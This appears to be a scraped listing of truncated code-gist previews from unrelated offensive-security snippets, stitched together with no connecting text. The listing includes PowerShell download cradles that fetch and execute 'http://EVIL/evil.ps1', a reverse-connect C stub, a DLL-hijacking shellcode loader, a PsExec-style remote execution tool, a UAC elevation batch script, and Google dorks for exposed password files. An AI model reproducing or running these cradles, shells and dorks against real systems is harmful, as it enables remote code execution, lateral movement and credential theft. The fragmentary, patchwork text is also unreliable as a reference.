| <?xml version='1.0' encoding='utf-8'?> | |
| <methodCall> | |
| <methodName>wp.uploadFile</methodName> | |
| <params> | |
| <param><value><string>1</string></value></param> | |
| <param><value><string>username</string></value></param> | |
| <param><value><string>password</string></value></param> | |
| <param> | |
| <value> | |
| <struct> |
| #include "stdafx.h" | |
| #define DB(_val_) __asm __emit (_val_) | |
| #define INVALID_SYSCALL (DWORD)(-1) | |
| // code selectors | |
| #define CS_32 0x23 | |
| #define CS_64 0x33 |
| // Dll Hijacking via Thread Creation | |
| // Author - Vivek Ramachandran | |
| // Learn Pentesting Online -- http://PentesterAcademy.com/topics and http://SecurityTube-Training.com | |
| // Free Infosec Videos -- http://SecurityTube.net | |
| #include <windows.h> | |
| #define SHELLCODELEN 2048 |
| /* credits to http://blog.techorganic.com/2015/01/04/pegasus-hacking-challenge/ */ | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <netinet/in.h> | |
| #include <sys/types.h> | |
| #include <sys/socket.h> | |
| #define REMOTE_ADDR "XXX.XXX.XXX.XXX" | |
| #define REMOTE_PORT XXX |
| admin account info" filetype:log | |
| !Host=*.* intext:enc_UserPassword=* ext:pcf | |
| "# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd | |
| "AutoCreate=TRUE password=*" | |
| "http://*:*@www” domainname | |
| "index of/" "ws_ftp.ini" "parent directory" | |
| "liveice configuration file" ext:cfg -site:sourceforge.net | |
| "parent directory" +proftpdpasswd | |
| Duclassified" -site:duware.com "DUware All Rights reserved" | |
| duclassmate" -site:duware.com |
| The file install-vmware-tools is from REMnux v6 scripts: https://launchpad.net/~remnux/+archive/ubuntu/stable/+files/remnux-scripts_0.1.50.tar.gz | |
| install-vmware-tools_TrietPTM is my patch for the "install-vmware-tools" script that’s present on REMnux v6 to fix a compatibility issue between VMware Tools and the Linux kernel included in Ubuntu, which prevents shared folders from working. | |
| Other Ways You Can Help With REMnux: https://zeltser.com/remnux-v6-release-for-malware-analysis/ |
| function Invoke-PsExec { | |
| <# | |
| .SYNOPSIS | |
| This function is a rough port of Metasploit's psexec functionality. | |
| It utilizes Windows API calls to open up the service manager on | |
| a remote machine, creates/run a service with an associated binary | |
| path or command, and then cleans everything up. | |
| Either a -Command or a custom -ServiceEXE can be specified. | |
| For -Commands, a -ResultsFile can also be specified to retrieve the |
| @echo off | |
| echo Checking for permissions | |
| >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" | |
| echo Permission check result: %errorlevel% | |
| REM --> If error flag set, we do not have admin. | |
| if '%errorlevel%' NEQ '0' ( | |
| echo Requesting administrative privileges... |
extension_id=jifpbeccnghkjeaalbbjmodiffmgedin # change this ID
curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc"
unzip -d "$extension_id-source" "$extension_id.zip"Thx to crxviewer for the magic download URL.
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |